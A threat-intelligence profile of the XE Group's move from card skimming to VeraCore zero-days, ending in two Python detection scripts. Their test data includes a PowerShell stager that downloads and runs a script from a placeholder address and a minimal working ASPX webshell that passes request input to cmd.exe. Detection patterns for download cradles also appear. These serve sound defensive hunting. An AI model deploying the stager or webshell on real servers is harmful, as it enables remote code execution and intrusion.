Full Report
The Vietnam-based group has grown more sophisticated since 2013, new research shows. The post From credit card fraud to zero-day exploits: Xe Group expanding cybercriminal efforts appeared first on CyberScoop.
Analysis Summary
# Threat Actor: XE Group
## Attribution & Identity
* **Identification:** Vietnam-based cybercriminal organization.
* **Known Aliases and Associated Groups:** Tracked as XE Group. The group has been operating since at least 2013.
## Activity Summary
XE Group has evolved significantly since 2013, moving from commodity financial cybercrime (payment-card skimming) to stealthy, long-term intrusions and zero-day exploitation of supply chain software for information theft.
* **2013 to roughly 2023 (early activity):** Credit-card skimming against e-commerce platforms, gaining access by exploiting known vulnerabilities in web components such as Telerik UI for ASP.NET and deploying webshells to steal payment data.
* **2020:** Planted a webshell on a victim system that went unused until 2024. In the same intrusion the group ran obfuscated Transact-SQL queries to extract database credentials, which it then used for further file uploads.
* **2024 (recent shift):** Moved to targeted information theft, exploiting two zero-day vulnerabilities in **VeraCore** (supply chain management software used by fulfillment companies): an upload validation flaw and a SQL injection flaw. The intrusions yielded configuration files and long-term access. The same year the group reactivated the webshell it had planted in 2020, four years earlier.
## Tactics, Techniques & Procedures
* Initial access via exploitation of known vulnerabilities (e.g., Telerik UI for ASP.NET) and more recently, zero-day vulnerabilities (VeraCore upload validation and SQL injection flaws).
* **Persistence:** Prioritizes long-term access, demonstrated by reactivating a webshell planted four years prior (2020 breach reused in 2024).
* **Webshell Usage:** Deploy customized variants of open-source webshells such as **ASPXSpy** (MITRE ATT&CK ID: S0073).
* **Credential Theft:** Extracted database credentials using obfuscated Transact-SQL queries (2020).
* **Discovery/Reconnaissance (2024):** Used native Windows utilities such as `arp` and `netstat` for network mapping, living off the land rather than dropping dedicated tooling.
* **Command and Control (C2) / Payload Delivery (2024):** Used PowerShell scripts to load **Meterpreter**, the Metasploit Framework's in-memory post-exploitation payload (used by red teams and threat actors alike), to establish covert C2 channels.
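The two 2024 behaviours above (native recon binaries spawned from the webshell, and PowerShell loading a payload) are both visible in process-creation telemetry. The following is an added example written for this summary, not code from the CyberScoop article or the research it reports on; it scores constructed Sysmon-style events (the JSON field subset, the sample process trees and the `203.0.113.10` address are all assumptions made here) for the IIS worker process `w3wp.exe` spawning shells or discovery tools, and for PowerShell encoded commands and download cradles, decoding `-EncodedCommand` so the stager text itself can be inspected.

```python
"""Hunt for XE Group-style post-exploitation in process-creation telemetry.

Added example for this summary; it is not code from the CyberScoop article or
the research behind it. The input is an assumed, constructed JSON-lines subset
of Sysmon Event ID 1 / Windows 4688 fields (ParentImage, Image, CommandLine, User).
"""
import base64
import json
import re
from typing import Optional

# Native Windows utilities the report says the group ran for network mapping,
# extended with a few other living-off-the-land discovery tools (assumption).
RECON_BINARIES = {"arp.exe", "netstat.exe", "ipconfig.exe", "whoami.exe", "net.exe", "nltest.exe"}
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# An ASPX webshell runs inside the IIS worker process, so anything w3wp.exe spawns is suspect.
WEB_WORKER = "w3wp.exe"

# Substrings typical of PowerShell stagers that pull and run a payload in memory.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"invoke-expression", r"\biex\b", r"frombase64string", r"reflection\.assembly",
)]
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), if any."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> list:
    """Return finding tags for one process-creation event (empty list if clean)."""
    findings = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")

    if parent == WEB_WORKER and image in SHELL_BINARIES | RECON_BINARIES:
        findings.append(f"webshell_child_process:{image}")
    if image in RECON_BINARIES:
        findings.append(f"native_recon:{image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmdline)
        if decoded:
            findings.append("powershell_encoded_command")
        # Match cradle indicators against the visible command line and the decoded script.
        text = cmdline + " " + (decoded or "")
        if any(p.search(text) for p in CRADLE_PATTERNS):
            findings.append("powershell_download_cradle")
    return findings


def hunt(lines) -> list:
    """Run analyse_event over JSON-lines telemetry; return (event, findings) pairs for hits."""
    hits = []
    for line in lines:
        if line.strip():
            event = json.loads(line)
            findings = analyse_event(event)
            if findings:
                hits.append((event, findings))
    return hits


# Constructed sample telemetry (not victim data). 203.0.113.10 is a documentation address.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
ENCODED_STAGER = base64.b64encode(_STAGER.encode("utf-16-le")).decode()
SAMPLE_TELEMETRY = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c arp -a", "User": r"IIS APPPOOL\DefaultAppPool"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\netstat.exe",
     "CommandLine": "netstat -ano", "User": r"IIS APPPOOL\DefaultAppPool"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED_STAGER}", "User": r"CORP\svc-web"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "User": r"NT AUTHORITY\SYSTEM"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Temp", "User": r"CORP\alice"},
])

if __name__ == "__main__":
    for event, findings in hunt(SAMPLE_TELEMETRY.splitlines()):
        print(", ".join(findings), "<-", event["CommandLine"][:70])
```

The `w3wp.exe` parent check is the highest-fidelity rule here: a legitimate ASP.NET application almost never needs to spawn `cmd.exe` or `netstat.exe`, so it can page on its own, while the `native_recon` and cradle tags are better treated as hunting leads that need the surrounding process tree and user context before escalation.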
## Targeting
* **Sectors:** Initially e-commerce; currently concentrated on **manufacturing and distribution**, which follows from targeting VeraCore, a supply chain management product used in those sectors.
* **Geography:** The targeted product has an international customer base, so exposure is not confined to one region; the group itself is based in **Vietnam**.
* **Victims:** Fulfillment companies and retailers using VeraCore software.
## Tools & Infrastructure
* **Malware Families:** Meterpreter (the Metasploit Framework's post-exploitation payload), loaded via PowerShell.
* **Webshells:** Customized variants of ASPXSpy.
* **Infrastructure:** Utilizes domains for command-and-control and hosting skimming tools.
* **Exploited Software:** Telerik UI for ASP.NET (older campaigns); VeraCore supply chain management software (recent zero-day exploitation).
## Implications
XE Group has rapidly evolved from a traditional cybercriminal entity focused on immediate financial gain (credit card skimming) into a highly sophisticated threat actor prioritizing stealth and long-term persistence. Their focus on zero-day exploitation within supply chain software elevates the risk profile, suggesting potential pivoting towards espionage or enabling larger cyber operations beyond simple data theft. Their operational discipline (maintaining access for 4+ years) poses significant detection challenges for victims.
## Mitigations
* Track the status of the VeraCore SQL injection flaw, which the research reports as still unpatched, and limit the privileges of the database account the application uses until a fix ships.
* Apply vendor-issued temporary fixes immediately (e.g., VeraCore upload validation flaw fix).
* Enhance detection for webshell activity, including customized ASPXSpy variants: alert on the IIS worker process (`w3wp.exe`) spawning `cmd.exe`, PowerShell or other unexpected child processes, and baseline the server-side files in each web root so new or altered handlers stand out.
* Implement stringent monitoring for unusual network mapping (`arp`, `netstat`) and PowerShell activity used for payload loading.
* Assume that database credentials harvested in an earlier intrusion (the 2020 T-SQL extraction) remain valid unless rotated: rotate them, and hunt web roots for webshells left from that period, since the 2024 reactivation shows that remediating only the original entry point leaves a dormant backdoor in place.
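The last mitigation is the one most victims skip: a webshell planted in 2020 and untouched until 2024 survives every patch cycle in between. Below is an added example written for this summary, not code from the article or the research it summarises, showing how to hunt an IIS web root for dormant ASPX handlers. It scores server-side files on constructs a command-execution webshell needs (request input feeding `Process.Start`, reflection loaders, ad hoc SQL), skips files whose SHA-256 matches a known-good deployment baseline, and marks anything untouched for more than a year as dormant. The indicator regexes, their weights, the one-year threshold and the two sample pages are all assumptions constructed here so the script runs offline; the "shell" page is a minimal stand-in, not ASPXSpy source.

```python
"""Hunt an IIS web root for dormant ASPX webshells such as customised ASPXSpy variants.

Added example for this summary, not code from the article or the underlying research.
The indicator regexes, weights and the one-year dormancy threshold are assumptions;
the two sample pages are constructed here so the script runs offline.
"""
import hashlib
import os
import re
import tempfile
import time
from pathlib import Path

HANDLER_EXTS = {".aspx", ".ashx", ".asmx", ".asax"}
DORMANT_AFTER_DAYS = 365  # assumption: untouched for a year yet still served is worth a look

# (name, pattern, weight): constructs a command-execution webshell needs, weighted by how
# rarely a normal page uses them. Weights are an assumption, not a published signature.
INDICATORS = [(n, re.compile(p, re.IGNORECASE), w) for n, p, w in (
    ("request_input", r"Request\s*(?:\[|\.Form|\.QueryString|\.Params)", 1),
    ("diagnostics_import", r"System\.Diagnostics", 1),
    ("process_start", r"\bProcess(?:StartInfo)?\b", 3),
    ("reflection_load", r"Assembly\.Load|Activator\.CreateInstance|CompileAssemblyFromSource", 3),
    ("sql_adhoc", r"SqlCommand|SqlConnection", 1),
    ("filesystem_write", r"File\.WriteAll|SaveAs\s*\(|FileStream", 2),
    ("aspxspy_marker", r"ASPXSpy", 5),
)]


def score_file(path: Path):
    """Return (score, matched indicator names) for one server-side page."""
    text = path.read_text(errors="replace")
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def scan_webroot(root, baseline=frozenset(), threshold=4, now=None):
    """Flag handler files scoring >= threshold whose SHA-256 is not in the known-good baseline."""
    now = now if now is not None else time.time()
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in HANDLER_EXTS:
            continue
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        if digest in baseline:
            continue  # byte-identical to the deployed release: skip
        score, names = score_file(path)
        if score < threshold:
            continue
        age_days = (now - path.stat().st_mtime) / 86400
        findings.append({
            "path": str(path), "sha256": digest, "score": score, "indicators": names,
            "age_days": round(age_days), "dormant": age_days >= DORMANT_AFTER_DAYS,
        })
    return findings


# Constructed sample pages. The "shell" is a minimal stand-in, not ASPXSpy source.
BENIGN_ASPX = '''<%@ Page Language="C#" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    string name = Request.QueryString["name"] ?? "world";
    Response.Write("Hello " + Server.HtmlEncode(name));
}
</script>'''

SHELL_ASPX = '''<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    string c = Request["c"];
    if (c == null) return;
    var psi = new ProcessStartInfo("cmd.exe", "/c " + c) { RedirectStandardOutput = true, UseShellExecute = false };
    Response.Write(Process.Start(psi).StandardOutput.ReadToEnd());
}
</script>'''


def build_demo_webroot() -> Path:
    """Write the two sample pages to a temp dir; backdate the shell 1500 days to look dormant."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "Default.aspx").write_text(BENIGN_ASPX)
    shell = root / "images" / "cache.aspx"
    shell.parent.mkdir()
    shell.write_text(SHELL_ASPX)
    old = time.time() - 1500 * 86400
    os.utime(shell, (old, old))
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_demo_webroot()):
        print(f"{f['path']}: score={f['score']} dormant={f['dormant']} {f['indicators']}")
```

Treat the modification time as a hint only: it is trivially timestomped, and a shell dropped under an unrelated directory such as `images/` relies on nobody looking there rather than on looking new. The hash baseline is the stronger control, which is why the mitigation above pairs the hunt with baselining each web root against the deployed release.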